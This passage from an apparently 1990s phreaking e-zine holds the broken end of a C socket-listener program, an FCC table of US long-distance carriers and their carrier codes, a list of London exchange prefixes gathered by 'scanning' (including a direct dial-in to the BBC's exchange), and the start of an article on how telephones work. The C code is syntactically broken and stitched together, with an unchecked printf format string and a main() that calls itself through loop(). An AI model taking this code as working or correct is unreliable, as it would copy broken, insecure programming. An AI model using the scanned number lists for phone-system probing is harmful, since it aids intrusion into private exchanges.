sock = socket(AF_INET, SOCK_STREAM, 0);
bind(sock, (struct sockaddr *) &address, sizeof(address));

listen(sock, 1);
newsock = accept(sock, NULL, NULL);
connected = 1;

while (connected)
{
if (sock_readln(newsock, buffer, 1024) <= -)
{
connected = 0;
}

int handle;
char c;

handle = open(log, O_WRONLY);
printf(str);
close(handle);

outport(sock_readln(newsock, buffer, 1024), X1);
else {
outport(sock_readln(newsock, buffer, 1024, Y0);
}

close(newsock);
close(sock);
loop();
return(0);
}

void loop()
{
main();
}

/*shoutouts to everyone in #legions on efnet*/

===================================EOF===========================================



%%%%%%%%%%%%%%%%%%%%%%%%%
\ Long Distance Carriers\-<Levine>
%%%%%%%%%%%%%%%%%%%%%%%%%



Here's another table from the FCC's BBS listing all of the operating IXC's
in the country with the states where they operate. There's a big matrix of
which states each carrier operates in, not reproduced here.

I was surprised to find that the only carriers that operate in all 50
states (actually 49 states and D.C., since Alaska is special, until
very recently a monopoly jointly operated by Alascom and AT&T) are
the big three, AT&T, MCI, and Sprint. C&W, LDDS, and Wiltel operate
in 49 states, all but Alaska. Allnet operates in 48, all but Alaska
and Arkansas. (I have no idea what their problem is in Arkansas.)
There are two that operate in 45 states, and the rest are down in the
30s or below.

The state with the fewest carriers listed is Delaware, with 6. I
expect that's a wart of geography -- all of Delaware is in the
Philadelphia LATA, so Delaware customers can be served from a POP in
Pennsylvania.

Regards,

Levine, johnl@iecc.com
Primary Perpetrator of "
The Internet for Dummies"

STATES
CARRIER CIC ACNA SERVED

Totals by state:
ACC LONG DISTANCE CORPORATION 0234 ACT 9
ACCESS LONG DISTANCE 0991 AMM 7
ACCESS SERVICES dba PACIFIC NW TELECOM 0013 GMS 3
ACCESS-PLUS, INC. 0551 AEQ 1
ACTION TELECOMMUNICATIONS CO. 0282 ATC 4
ADDTEL COMMUNICATIONS 0414 ADX 1
ADVANCED COMMUNICATIONS SYSTEMS, INC. 0260 AVD 2
ADVANTIS 0755 ALC 3
AFFILIATED TELECOM SVCS., INC. 0790 AFF 1
ALASCOM, INC. 0866 AAM 1
ALLCOMM LONG DISTANCE, INC. 0075 AOM 1
ALLNET COMM. SVC., INC. [LDX, LEXITEL] 0444 ALN 48
ALTERNATE COMM TECHNOLOGY, INC. 0405 ACX 3
AMERICALL COMMUNICATIONS 0682 AIY 5
AMERICALL CORPORATION (CALIF.) 0099 ARZ 2
AMERICAN COMMUNICATIONS INT'L, LTD. 0145 ANU 2
AMERICAN COMMUNICATIONS NETWORK, INC. 0061 AZC 1
AMERICAN COMMUNICATIONS TECHNOLOGY, INC. 0645 AXC 1
AMERICAN DISCOUNT TELECOMMUNICATIONS, INC. 0598 AOU 1
AMERICAN LONG DISTANCE CORPORATION 0028 VOB 1
AMERICAN LONG DISTANCE EXCHANGE, INC. 0540 AXL 6
AMERICAN LONG DISTANCE SERVICES 0504 AMF 1
AMERICAN LONG LINES 0241 ALG 9
AMERICAN NETWORK EXCHANGE, INC. 0370 ANK 26
AMERICAN SHARECOM, INC. 0322 ASI 14
AMERICAN TELCO NETWORK SERVICES, INC. 0663 ANN 1
AMERICAN TELECOMMUNICATIONS ENTERPRISES 0813 AEW 18
AMERICAN TELECOMMUNICATIONS HOLDING, LTD. 0573 AMH 1
AMERICAN TELEPHONE NETWORK 0648 AZN 15
AMERICAN TELNET, INC. 0307 AQA 0
AMERICOM COMMUNICATIONS 0567 AMS 4
AMERISYSTEMS, INC. 0362 EOC 2
AMERITEL LONG DISTANCE, INC. 0975 ALQ 1
AMNET, INC. 0128 AXT 1
AMPTELCO CORPORATION 0267 APC 1
AMVOX 0617 AVX 1
ANSWER-NET, INC. 0143 AWE 1
APPLE COMMUNICATIONS 0095 AZL 2
APPLIED SIGNAL CORPORATION 0256 APD 1
ARCH TELECOM 0304 LUS 1
ASCENDING TECHNOLOGIES 0139 AWT 1
ASSOCIATED TELENET, INC./ A CTI COMPANY 0279 ASN 1
AT&T COMMUNICATIONS 0288 ATX 50
ATLANTIC TELEPHONE COMPANY, INC. 0125 AQT 1
ATX TELECOMMUNICATIONS SERVICES 0004 ATZ 12
AUSTIN BESTLINE 0302 ABN 1
AUTOMATED COMMUNICATIONS, INC. 0244 AUD 8
AUTOMATED TELEPHONE 0235 EMT 2
AUTUMN COMMUNICATIONS, INC. 0779 AUX 4
B.R. COMMUNICATIONS 0791 BRR 1
BEE LINE LONG DISTANCE 0276 BLE 1
BITTEL TELECOMMUNICATIONS CORPORATION 0867 BTL 1
BIXBY TELEPHONE LONG DISTANCE CO. 0580 BXT 1
BIZ TEL LONG DISTANCE TELEPHONE CO. 0606 BIZ 1
BRANSON TELEPHONE 0836 BRN 1
BROWER NETWORK 1 0037 NWO 4
BUDGET CALL LONG DISTANCE 0368 BUC 16
BURLINGTON TELEPHONE COMPANY 0515 BUR 6
BUSINESS CHOICE NETWORK 0736 BCH 1
BUSINESS TELECOM, INC. 0833 BTM 9
C & G ASSOCIATES 0788 SIG 1
CABLE & WIRELESS COMM, INC. (TDX) 0223 TDX 49
CALL AMERICA 0300 CMA 4
CALL AMERICA BUSINESS COMM. CORP. 0344 CBU 1
CALL AMERICA OF PALM DESERT 0410 CPD 1
CALL AMERICA OF RIVERSIDE 0351 CRV 2
CALL FOR LESS LONG DISTANCE 0259 CFX 1
CALL SAVERS, INC. 0291 CSF 1
CALL TECHNOLOGY CORP. OF PHILADELPHIA 0091 CTG 2
CALL-USA, INC. 0429 FNS 1
CAM-NET, INC. 0046 CNZ 1
CAMBRIDGE COMMUNICATIONS 0487 CBG 1
CAMERON LONG DISTANCE 0670 CAO 1
CAPITAL NETWORK SYSTEMS, INC. 0425 CAQ 20
CAPITAL TELECOMMUNICATIONS, INC. 0221 CPL 11
CARIBBEAN TELEPHONE & TELEGRAPH, INC. 0383 CIB 1
CELLULAR LONG DISTANCE CO. 0530 CUL 1
CELLULAR, INC. 0748 CLW 0
CENTURY AREA LONG LINES 0550 CAL 1
CENTURY TELECOMMUNICATIONS, INC. 0914 SMD 2
CHADWICK TELEPHONE 0909 CWV 4
CHERRY COMMUNICATIONS 0270 CHY 11
CHILLICOTHE LONG DISTANCE 0293 LSP 1
CINCINNATI BELL LONG DISTANCE, INC. 0654 CBD 6
CITYNET COMMUNICATIONS, INC. 0774 CYU 1
CLEARTEL COMMUNICATIONS 0548 CRZ 12
CLIFTON PHONE SYSTEMS 0309 CFP 1
COACHELLA VALLEY COMM. dba INTEG. OP. SVCS 0629 CHL 2
COAST INTERNATIONAL, INC. 0063 CIZ 5
COAST TO COAST TELECOMMUNICATIONS 0902 MWT 1
COASTAL AUTOMATED COMMUNCATIONS CORP. 0966 AUC 11
COLONIAL ENTERPRISE, INC. 0329 CQL 2
COLORADO RIVER COMMUNICATIONS 0306 CDR 1
COLUMBIA TEL 0918 CBA 1
COMCENTRAL dba SOUTHNET SERVICES, INC. 0934 SUH 1
COMCENTRAL, INC. 0611 COX 1
COMMONWEALTH LONG DISTANCE CO. 0336 CWZ 4
COMMUNICATION SERVICES OF COLORADO 0675 NSL 1
COMMUNICATIONS BROKERS, INC. 0640 NBK 1
COMMUNICATIONS CABLE LAYING CO., INC. 0339 CAB 2
COMMUNICATIONS GATEWAY NETWORK, INC. 0643 CGW 1
COMMUNICATIONS OPTIONS, INC. 0073 CPW 1
COMMUNICATIONS TELESYSTEMS, INTL. (CTI) 0502 CXM 15
COMMUNICATIONS, INC., dba ECI 0667 THG 1
COMMUNIQUE TELECOMMUNICATIONS, INC. 0810 CQE 7
COMWEST COMMUNICATIONS 0238 CWS 1
CONNECT AMERICA COMMUNICATIONS, INC. 0660 CQA 9
CONNECT AMERICA CORP. 0374 CQB 6
CONQUEST 0319 CQO 26
CONSOLIDATED NETWORK, INC. 0725 CDN 13
CONTACT AMERICA, INC. 0646 COA 1
CONTINENTAL LONG DISTANCE 0701 CWG 1
CONTINENTAL TELECOMMUNICATIONS GROUP 0612 CGR 1
CORPORATE TELEMANAGEMENT GROUP 0690 CGP 6
CUSTOM TELECOM. NETWORK OF ARIZONA 0586 CZZ 2
CYBERLINK 0618 CYB 1
CYPRESS TELECOMMUNICATIONS CORP., (CYTEL) 0203 CTQ 4
DATA & ELECTRONIC SERVICES, INC. 0147 DES 1
DELTA COMMUNICATIONS, INC. 0233 DLT 8
DELTACOM, INC. 0240 SIR 2
DELUXE DATA SYSTEMS 0693 DLX 3
DIAL LONG DISTANCE CORP. 0398 DSC 0
DIAL-NET, INC. 0969 DNI 7
DIGITAL NETWORK SERVICES, INC. 0064 DSV 2
DIGITAL NETWORK, INC. 0853 TXL 2
DIGITRAN CORP. 0543 DTR 5
EASTERN TELELOGIC CORPORATION 0303 ETL 2
EASTERN TELEPHONE SYSTEMS, INC. 0054 ETS 5
ECON-A-CALL, INC., OF HAYS 0497 ECA 1
ECONO-LINE WACO 0373 ECW 1
ECONO. CALL LONG DISTANCE SERVICES 0325 ECR 2
ECONOMY TELEPHONE, INC. 0060 ECY 1
EDS 0650 UTA 2
ELECTRIC LIGHTWAVE, INC. 0802 ELG 2
EMI COMMUNICATIONS CORPORATION 0365 EMI 5
ENVOY GLOBAL 0868 EGI 1
EQUICOM COMMUNICATIONS, INC. 0364 EQM 1
ETSC 0048 ETM 1
EXCEL TELECOMMUNICATIONS, INC. 0752 EXL 2
EXECULINES OF SACRAMENTO 0511 ESM 5
EXECULINES OF THE NORTHWEST, INC. 0705 ENW 2
FARMERS LONG DISTANCE, INC. 0531 FAR 1
FEB CORPORATION 0922 FEB 0
FEDERAL TRANSTEL, INC. 0285 FTT 0
FEIST LONG DISTANCE 0679 SWB 3
FIBERLINK COMMUNICATIONS CORP. 0051 FBL 1
FIBERTECH TELECOM, INC. 0479 FTI 4
FIRST FONE LONG DISTANCE 0935 FSL 2
FIRSTEL 0475 FTL 3
FLEX COMMUNICATIONS SYSTEM 0096 FLX 3
FONE AMERICA, INC. 0503 FAC 4
FOX COMMUNICATIONS CORPORATION 0637 FOX 3
FUTURE TELEPHONE COMMUNICATIONS 0121 FRE 1
GENERAL COMMUNICATION, INC. 0077 GCN 2
GLENS FALLS LONG DISTANCE SERVICES 0295 GFS 1
GULF LONG DISTANCE, INC. 0962 GLG 3
HAWAIIAN TELEPHONE COMPANY 0015 HWT 1
HEARTLINE COMMUNICATIONS, INC. 0009 HER 4
HEDGES & ASSOCIATES 0049 HDG 1
HEREFORD LONG DISTANCE SERVICES 0584 WRU 1
HI-PLAINS NTS COMMUNICATIONS 0722 HPL 1
HOGAN COMMUNICATIONS 0965 HOG 2
HOME OWNERS LONG DISTANCE, INC. 0882 HOL 1
HOTEL NETWORKS 0575 HNT 1
HSS VENDING DISTRIBUTORS 0392 HSV 0
ICON COMMUNICATIONS CORP. 0706 ICU 2
IFC COMMUNICATIONS 0141 IFF 0
INFO-TEL, INC. 0433 IFT 0
INFOACCESS, INC. 0172 IFA 0
INFORMATICS, INC. 0583 IFC 5
INNOVATIVE COMMUNICATIONS, INC. 0510 INV 1
INTEGRATED SYSTEMS CORPORATION 0696 IGA 1
INTEGRETEL, INC. 0402 IGT 0
INTELCO 0465 TEC 2
INTELLICALL OPERATOR SERVICES 0034 ICH 1
INTERAMERICAN TELEPHONE CO. (ITC) 0936 IAT 1
INTERLINK TELECOMMUNICATIONS 0904 ILK 2
INTERNATIONAL AUDIOTEXT NETWORK, INC. 0509 IAN 9
INTERNATIONAL CELLULAR, INC. 0943 CEO 1
INTERNATIONAL PACIFIC 0589 IPC 7
INTERNATIONAL TELECOMMUNICATIONS CORP. 0519 IZT 0
INTERSTATE TELECOM SVCS., INC. 0964 ILC 1
INTL. 800 TELECOM dba TELECALL LONG DIST. 0685 NTI 1
IOWA NETWORK SERVICES, INC. 0225 IAS 2
ITC NETWORKS 0468 IUT 4
KENTUCKY TELEPHONE CORPORATION 0062 KTC 1
KEYSTONE LONG DISTANCE 0699 KYL 6
KEYSTONE TELECOM, INC. 0545 KST 1
KEYSTONE TELECOMMUNICATIONS, INC. 0703 KSN 1
KRB TELECOM 0989 KRB 4
L.D. NETWORK, INC. 0931 LDQ 1
L.D. SERVICES, INC. 0280 LSE 4
LA CONEXION FAMILIAR, INC. 0926 LCF 4
LAKE STATES COMMUNICATIONS, INC. 0552 LKS 1
LANDMARK COMMUNICATIONS COMPANY, INC. 0193 LMK 1
LCI 0562 LCZ 4
LCI INTERNATIONAL/LITEL 0432 LGT 45
LCT LONG DISTANCE 0561 LKC 1
LDB INTERNATIONAL CORPORATION 0477 LDB 9
LDDS 0450 LDD 49
LDS OF ALEXANDRIA 0036 LDA 1
LDS OF MONROE 0036 LMN 1
LDS OF SHREVEPORT 0036 LSH 1
LECNET, INC. 0299 TFP 1
LINKUSA CORPORATION 0563 LNK 1
LINTEL SYSTEMS/LTLD 0579 LNS 1
LOCATE TELEPHONE COMPANY 0512 LAT 1
LONE STAR TELECOM 0205 LST 1
LONG DISTANCE AMERICA 0035 CWK 2
LONG DISTANCE COMMUNICATIONS 0607 LDC 1
LONG DISTANCE DISCOUNT, INC. 0533 LGD 6
LONG DISTANCE MANAGEMENT 0536 LDM 4
LONG DISTANCE MANAGEMENT, INC. 0382 LGM 1
LONG DISTANCE NETWORK 0395 LOS 4
LONG DISTANCE NORTH OF NEW HAMPSHIRE 0516 LNH 5
LONG DISTANCE OF MICHIGAN 0631 LMI 14
LONG DISTANCE OHIO, INC. 0564 LOH 1
LONG DISTANCE SAVERS 0036 LSI 6
LONG DISTANCE TELEPHONE SAVERS, INC. 0213 LTS 3
LONG DISTANCE TRANSFER, INC. 0069 LOG 3
MANITOWOC LONG DISTANCE SERVICE 0357 MTZ 1
MARATHON COMMUNICATIONS 0014 MHZ 1
MATRIX TELECOM 0780 MXT 7
MCI 0222 MCI 50
METRO ONE DIRECT 0565 MDI 1
METRO TELECOM, INC. 0692 MEO 0
METRO TELECOMM. SVCS., INC. dba METROCOMM 0860 TWH 3
METRO TELEPHONE, INC. 0635 MHE 1
METRONET LONG DISTANCE COMMUNICATIONS 0258 MLD 1
MFS INTELENET, INC. 0440 MFZ 3
MID ATLANTIC TELECOM 0086 MAD 9
MID-COM COMMUNICATIONS, INC. 0495 MIZ 2
MIDCO COMMUNICATIONS 0338 MIT 1
MIDCOM OF ARIZONA, INC. 0558 MDL 1
MIDTEL LONG DISTANCE MINOT 0932 MMN 1
MIDWEST TELECOM 0980 MWS 1
MIDWEST TELEPHONE SERVICE, INC. 0680 MDW 1
MINNESOTA INDEPENDENT.INTEREXCH.CO./MIIC 0264 MEN 1
MOUNTAINEER LONG DISTANCE, INC. 0923 MOI 4
MRC TELECOMMUNICATIONS, INC. 0912 NLG 1
MULTIMEDAI TELEPHONE SERVICE, INC. 0829 MUE 1
MUSTANG TELE-COMMUNICATIONS, INC. 0688 MNG 1
MVP COMMUNICATIONS, INC. 0827 SZT 1
NACT dba NETWORK TELEMANAGEMENT SERVICES 0806 NTG 1
NAPA VALLEY TELECOM SERVICES 0794 NVT 2
NATIONAL BRANDS, INC. 0549 NBI 1
NATIONAL DATA CORPORATION 0632 NLD 2
NATIONAL FIBERNET, INC. 0326 NFB 1
NATIONAL INDEPENDENT CARRIER EXCH., INC. 0059 GLD 2
NATIONAL TECHNICAL ASSOCIATES dba NTA 0683 NTK 1
NATIONAL TELE-SAV, INC. 0341 NSV 1
NATIONAL TELECOM. OF FLORIDA 0657 NFL 1
NATIONAL TELEPHONE EXCNAGE (PA) 0746 NLE 2
NATIONAL TELEPROCESSING, INC. 0697 NZT 1
NATIONAL TELESERVICE

  
0401 NNL 3
NATIONWIDE COMMUNICATIONS, INC. 0716 NND 3
NATIONWIDE LONG DISTANCE 0403 NGD 1
NCHE TELECOMMUNICATIONS NETWORK, INC. 0017 NCE 1
NET EXPRESS COMMUNICATIONS, INC. 0388 NXC 2
NETWORK BILLING AND COLLECTIONS, INC. 0871 NBZ 1
NETWORK LONG DISTANCE 0765 DCT 1
NETWORK ONE 0135 NOE 2
NETWORK OPERATOR SERVICES, INC. 0308 NOS 4
NETWORK USA 0881 CNK 1
NEW ENGLAND TELEDISCOUNT SYSTEMS, INC. 0940 NED 1
NEW TIMES, INC. 0945 NWM 0
NICKEL FONE 0423 NFN 1
NORTH AMERICAN COMMUNICATIONS, INC. 0933 NAC 2
NORTH AMERICAN TELEPHONE 0201 NHT 1
NORTH COUNTY COMMUNICATIONS CORPORATION 0890 NHC 6
NORTHERN ARIZONA COMMUNICATIONS CORP. 0491 NAR 1
NORTHERN TELECOM INC. 0376 NTQ 1
NORTHERN WISCONSIN L.D.S. 0713 NWD 1
NORTHLAND TELEPHONE SYSTEMS, LTD. 0332 NRD 1
NORTHWEST TELECOM, LTD. 0638 NWT 1
NORTHWEST TELECOMMUNICATIONS CO. 0212 NWS 3
NTC, INC. 0908 NCQ 3
NTS COMMUNICATIONS, INC. 0469 GMW 6
NTS NETOWRK TELECOMMUNICATIONS SERVICES 0644 SVV 1
NUESTRA TELEFONICA 0407 NUE 1
O.L.C. COMPANY 0651 OLC 1
OCOM CORPORATION 0590 OCO 1
ONCOR COMMUNICATIONS, INC. 0805 ONR 33
ONE CALL COMM. dba OPTICOM [ONE] 0880 SVL 33
ONE-2-ONE COMMUNICATIONS 0390 PRO 13
OPERATOR SERVICE CO. 0891 CIN 4
PACE LONG DISTANCE SERVICE 0757 PAC 13
PARKWAY COMMUNICATIONS, INC. 0553 PRK 1
PAY TEL COMMUNICATIONS, INC. 0917 PAY 1
PAYLINE SYSTEMS, INC. 0767 PLS 8
PDQ COMMUNICATIONS SOURCE 0178 PDQ 2
PENINSULA LONG DISTANCE SERVICE, INC. 0743 PLD 1
PEOPLE'S TELEPHONE COMPANY, INC. 0227 CYN 5
PEOPLES COMMUNCATIONS, INC. 0728 PIO 1
PHONE BASE SYSTEMS, INC. 0380 PHB 1
PHONE ONE 0393 EXF 1
PHONETEL TECHNOLOGIES, INC. 0838 PHT 6
PILGRIM TELEPHONE, INC. 0930 PLG 2
POLAR COMMUNICATIONS CORPORATION 0967 PLR 15
PREFERRED NETWORK 0976 PFR 1
PREMIER LONG DISTANCE SVCS., INC. 0342 PIE 1
PRIME TIME COMMUNICATIONS 0954 PRI 1
PRO TAS TELECOMMUNICATIONS 0673 PFE 1
PROTEL, INC. 0418 PTZ 0
PSA, INC. 0045 PSA 1
PSP MARKETING GROUP, INC. 0249 PMG 1
PUBLIC PHONE 0255 PUP 2
PUBLIC SERVICE COMPANY OF NEW MEXICO 0830 PSV 1
PUBLIC SWITCH CORP. 0740 PSW 1
QUEST TELECOMMUNICATIONS, INC. 0971 APV 1
R D & J COMMUNICATIONS MGMT., INC. 0642 RDJ 7
RANGER TELECOMMUNICATIONS 0047 RGR 1
RCI LONG DISTANCE 0003 RTC 26
READY CALL, INC. 0605 ESY 1
RESURGENS COMMUNICATION GROUP 0782 STE 4
RESURGENS WEST, INC. 0471 UEL 1
SCHNEIDER COMMUNICATIONS 0500 SCH 7
SCIENCE DYNAMICS CORPORATION 0609 SDD 1
SECURITEX dba TYLERNET LONG DISTANCE 0254 TYR 1
SHARED COMMUNICATIONS SERVICES, INC. 0246 SHD 2
SHARED USE NETWORK 0018 SNK 2
SHOW-ME LONG DISTANCE, INC. 0778 SHW 1
SONIC COMMUNICATIONS, INC. 0126 SNU 1
SOUTH CAROLINA NETWORK, INC. 0807 SNZ 1
SOUTHERN NEW ENGLAND TELEPHONE (SNET) 0763 SNG 1
SOUTHTEL CORPORATION 0792 SZU 4
SOUTHWEST UNITED COMMUNICATION, INC. 0993 SUC 1
SOUTHWESTERN TELECOM, INC. 0005 SOW 1
SP TELECOM 0056 SPA 6
SPRINT 0333 UTC 50
ST. JOE COMMUNICATIONS, INC. 0744 SJE 1
STANDARD COMMUNICATIONS, INC., dba SCI 0248 SCQ 1
STANDARD TELCOM, INC. 0352 STD 1
STAR TEL 0313 STR 1
STAR TEL OF ABILENE 0787 STT 1
STAR TEL OF VICTORIA 0983 STV 1
STAR TEL TRANSMISSION CO., INC. 0984 STA 1
STARTEC, INC. 0719 STZ 1
STENOCALL 0929 STO 1
STONE & COMPANY 0184 SOZ 1
SUNSHINE TELEPHONE, INC. dba SUNTEL 0784 SNH 1
SUNTEL, INC. 0247 SUL 3
SWITCH 2000, INC. 0727 SWH 3
SYNERGY TELEMANAGEMENT 0795 SGY 1
T M SEPULVEDA, INC. 0358 SEP 3
T-TEL 0493 TRF 2
TACONIC LONG DISTANCE SERVICE, CORP. 0245 TDT 4
TALTON TELECOMMUNICATIONS CORPORATION 0849 TWL 1
TCI COMMUNICATIONS, INC. 0560 TUC 3
TEASE COMMUNICATIONS 0883 TZY 2
TEL AMERICA 0700 TMU 7
TEL NET, INC. 0919 TNT 1
TEL OPTIC, INC., dba CALL AMERICA 0489 HGS 5
TEL SERV 0378 ALP 1
TEL-AMERICA NETWORK SERVICES, INC. 0274 TNW 3
TEL-CENTRAL OF JEFFERSON CITY 0218 TCQ 1
TEL-COM, INC. 0815 TEZ 1
TEL-SHARE 0330 TSH 1
TEL-SPAN COMMUNICATIONS, INC. 0520 TSW 1
TELALEASING ENT. INC. dba PHONE ZONE, INC. 0397 PZF 1
TELAMARKETING COMM OF BIRMINGHAM 0007 TOB 1
TELAMARKETING COMM OF MONTEREY 0007 TMY 1
TELAMARKETING COMM OF PIEDMONT 0007 TPI 1
TELAMARKETING COMM OF THE TRI-STATES 0007 TAE 1
TELAMARKETING COMMUNICATIONS, INC. 0007 TAM 11
TELAMERICA COMMUNICATIONS, INC. 0749 VCE 1
TELCO COMMUNICATIONS GROUP, INC. 0457 TDG 1
TELE TECH, INC. 0915 TTH 0
TELE-COMMUNICATIONS INT'L 0958 TTW 1
TELE-MATIC CORP. 0655 TMW 5
TELE-SYS, INC. 0482 TEI 1
TELECABLE CORPORATION 0845 TBQ 4
TELECOLUMBUS, USA dba WORLDCOM 0953 WDC 3
TELECOM WEST 0529 LWC 1
TELECOMMUNICATIONS CONSULTANTS, INC. 0029 TQC 1
TELECON COMMUNICATIONS CORPORATION 0518 TOX 1
TELECORP INTERNATIONAL 0985 TQI 2
TELEDATA INTERNATIONAL, INC. 0481 TDE 1
TELEGROUP 0630 TGP 0
TELEMANAGEMENT CONSULTANTS CORPORATION 0458 TGN 3
TELENATIONAL COMMUNICATIONS 0621 TZX 7
TELEPHONE ASSOC. LONG DISTANCE SERVICES 0837 TDS 2
TELEPHONE ASSOC., dba FERGUS FALLS LD 0498 FRG 1
TELEPHONE COMMUNICATIONS CORPORATION 0977 THZ 1
TELEPHONE ELECTRONICS NETWORK, LTD. 0745 TRW 0
TELEPHONE EXPRESS 0899 TEC 6
TELESAVER OF NEW MEXICO 0026 ABQ 1
TELESCAN, INC. 0731 TZC 2
TELEVOX PUBLIC COMMUNICATIONS, INC. 0409 TXV 1
TELNEX, INC. 0296 TXI 1
TELSTAR COMMUNICATIONS,INC. 0873 TPD 10
TELTRUST NETWORK SERVICES 0485 TUT 11
TELVUE COPORATION 0707 SDY 22
TEXUSTEL, INC. 0331 TXT 1
THE COMMUNIGROUP 0268 CUT 11
THE PAY TELEPHONE CO. 0798 PYT 1
THE REAL PUBLIC TELEPHONE COMPANY, INC. 0896 REL 1
THE SWITCHBOARD 0385 SBD 1
TMC LONG DISTANCE 0019 TSD 1
TMC OF LEXINGTON 0462 TLX 1
TMC OF OMAHA 0007 TOH 3
TMC OF SOUTHERN KENTUCKY 0942 TBG 1
TOTAL TELECOMMUNICATIONS, INC. 0848 TIO 1
TOTAL-TEL USA, INC. 0081 TTU 14
TOTALNET COMMUNICATIONS, INC. 0346 TQL 1
TOUCH 1, INC. 0797 TOA 20
TOUCH AMERICA, INC. 0335 THA 2
TOUCH-1 LONG DISTANCE, INC. 0751 TUH 8
TRANSACTION NETWORK SERVICES 0522 TAX 1
TRANSPACIFIC TELECOMMUNICATIONS, INC. 0578 TPF 3
TRI*TEL COMMUNICATIONS 0874 TIQ 7
TRI-STATE COMMUNICATIONS, INC. 0472 TIE 1
TRT TELECOMMUNICATIONS CORP. 0120 TRT 8
TTE OF CHARLESTON 0461 TTQ 1
U S COMNET 0229 UZC 2
U.S. ADVANTAGE LONG DISTANCE 0596 UAV 1
U.S. COMMUNCATIONS INC. 0879 USI 5
U.S. CONNECT CORPORATION 0574 USJ 5
U.S. FIBERCOM 0941 UFZ 1
U.S. FIBERLINE COMMUNICATIONS, INC. 0576 UFL 1
U.S. LINK 0355 USL 3
U.S. LONG DISTANCE, INC. 0556 ULD 12
U.S. NET, INC. 0298 USZ 1
U.S. NETWORK 0271 LNO 3
U.S. TELE-COMM, INC. 0396 USQ 1
ULTIMATE COMMUNICATIONS CORPORATION 0822 ULM 1
UNI-TEL OF FARMINGTON 0907 UNT 1
UNION TELEPHONE COMPANY 0855 UTT 3
UNITED COMMUNICATIONS, INC. 0955 PCL 1
UNITED L.D.S. 0840 UDS 1
UNITED TELEPHONE CO. dba TELAMERICA L.D. 0544 UTD 1
UNITED TELEPHONE LONG DISTANCE 0204 ULG 8
UNITED TELESYSTEMS, INC. 0861 USY 1
UNITEL 0863 UNE 1
UNITEL COMMUNICATIONS, INC. 0869 UCN 1
US COMM. INC., dba SOUTHWEST L.D.N., INC. 0568 JNT 3
US WATS 0200 UWT 6
VADACOM 0057 VDC 2
VALLEY STAR-TEL 0878 VST 1
VALU-LINE OF AMARILLO 0669 VOA 4
VALU-LINE OF KANSAS 0678 VLK 1
VALU-LINE OF LONGVIEW, INC. 0859 VLW 1
VALU-LINE OF ST. JOSEPH 0889 VSJ 1
VALUE-ADDED COMMUNICATIONS 0817 VAC 6
VARTEC dba METROTEL LONG DISTANCE 0818 MZL 23
VIP CONNECTIONS, INC. 0847 VPC 1
VRS BILLING SYSTEMS, INC. 0903 VSL 1
VTA, INC. 0041 CIS 1
WAUSAU LONG DISTANCE SERVICE 0753 WLD 1
WCS OPERATORS 0712 WCS 1
WEST COAST TELECOMMUNICATIONS, INC. 0569 WCU 45
WESTCOM LONG DISTANCE 0459 THT 1
WESTCOM, INC. 0938 WCO 5
WESTEL INC. 0085 WES 12
WESTERN OKLAHOMA INFORMATION SYSTEMS 0443 WOI 1
WESTERN TELECOM, INC. 0427 WTK 3
WESTERN TELENET, INC. 0431 WST 1
WILTEL 0555 WTL 49
YAVAPAI TELEPHONE EXCHANGE 0766 YTE 1
ZENEX LONG DISTANCE, INC. 0761 CJL 1
ZERO PLUS DIALING 0756 XZP 1

===================================EOF===========================================



%%%%%%%%%%%%%%%%%%%%%%%%
\ STD Phone Codes \-<foneman>
%%%%%%%%%%%%%%%%%%%%%%%%


[foneman]

Someone emailed me about STD Codes in Londen. So after doing some heavy scanning
here you go... Have Fun, I'll be back in kv6.



LONDEN STD CODES


0171 210 xxxx Westminster
NOX 211 xxxx Westminster
0171 212 xxxx Westminster
0171 230 xxxx Westminster (New Scotland Yard)
0181 255 xxxx Telewest Communications
0171 256 xxxx City of London (Moorgate)
0171 257 xxxx Covent Garden
0171 258 xxxx Paddington
0171 259 xxxx Belgravia or Brixton (!)
0181 281 xxxx Cable & Wireless (cable) for Buckhurst Hill, Essex
0171 283 xxxx City of London (Monument)
0171 308 xxxx Cable and wireless for private London Transport extensions
0181 317 xxxx Woolwich and Plumstead
0181 318 xxxx Lewisham
0181 319 xxxx Woolwich, Eltham and Greenwich
0171 321 xxxx Westminster
0171 323 xxxx Bloomsbury
0171 374 xxxx City of London (Moorgate)
0171 382 xxxx City of London (Moorgate)
0171 383 xxxx Euston
0171 385 xxxx Fulham
0171 386 xxxx Fulham
0181 395 xxxx Telewest (cable) Croydon
0181 395 xxxx Telewest (cable) Merton (Morden, Mitcham, Wimbledon)
0181 395 xxxx Telewest (cable) Sutton
0181 395 xxxx Telewest (cable) Richmond
0181 472 xxxx East Ham
0171 474 xxxx Plaistow and Canning Town
0181 475 xxxx Upton Park
0171 476 xxxx Plaistow and Canning Town
0181 478 xxxx Ilford
0171 487 xxxx St Marylebone
0171 488 xxxx City of London and Wapping
0171 489 xxxx City of London (St.Pauls)
0181 491 xxxx Cable & Wireless (cable) for Woodford, Essex
0181 576 1xxx Direct dial-in to BBC's EBX
0181 576 7xxx Direct dial-in to BBC's EBX

===================================EOF===========================================



%%%%%%%%%%%%%%%%%%%%%%%%
\ Telephony \-<N6ARE>
%%%%%%%%%%%%%%%%%%%%%%%%

julian@bongo.info.com -

Everybody has one, but what makes it work?

Although telephones and telephone company practices may vary
dramatically from one locality to another, the basic principles
underlying the way they work remain unchanged.

Every telephone consists of three separate subassemblies,
each capable of independent operation. These assemblies are the
speech network, the dialing mechanism, and the ringer or bell.
Together, these parts - as well as any additional devices such as
modems, dialers, and answering machines - are attached to the
phone line.


The phone line

A telephone is usually connected to the telephone exchange
by about three miles (4.83 km) of a twisted pair of No.22 (AWG)
or 0.5 mm copper wires, known by your phone company as "the
loop". Although copper is a good conductor, it does have
resistance. The resistance of No.22 AWG wire is 16.46 Ohms per
thousand feet at 77 degrees F (25 degrees C). In the United
States, wire resistance is measured in Ohms per thousand feet;
telephone companies describe loop length in kilofeet (thousands
of feet). In other parts of the world, wire resistance is
usually expressed as Ohms per kilometer.

Because telephone apparatus is generally considered to be
current driven, all phone measurements refer to current
consumption, not voltage. The length of the wire connecting the
subscriber to the telephone exchange affects the total amount of
current that can be drawn by anything attached at the
subscriber's end of the line.

In the United States, the voltage applied to the line to
drive the telephone is 48 VDC; some countries use 50 VDC. Note
that telephones are peculiar in that the signal line is also the
power supply line. The voltage is supplied by lead acid cells,
thus assuring a hum-free supply and complete independence from
the electric company, which may be especially useful during power
outages.

At the telephone exchange the DC voltage and audio signal
are separated by directing the audio signal through 2 uF
capacitors and blocking the audio from the power supply with a 5-
Henry choke in each line. Usually these two chokes are the coil
windings of a relay that switches your phone line at the
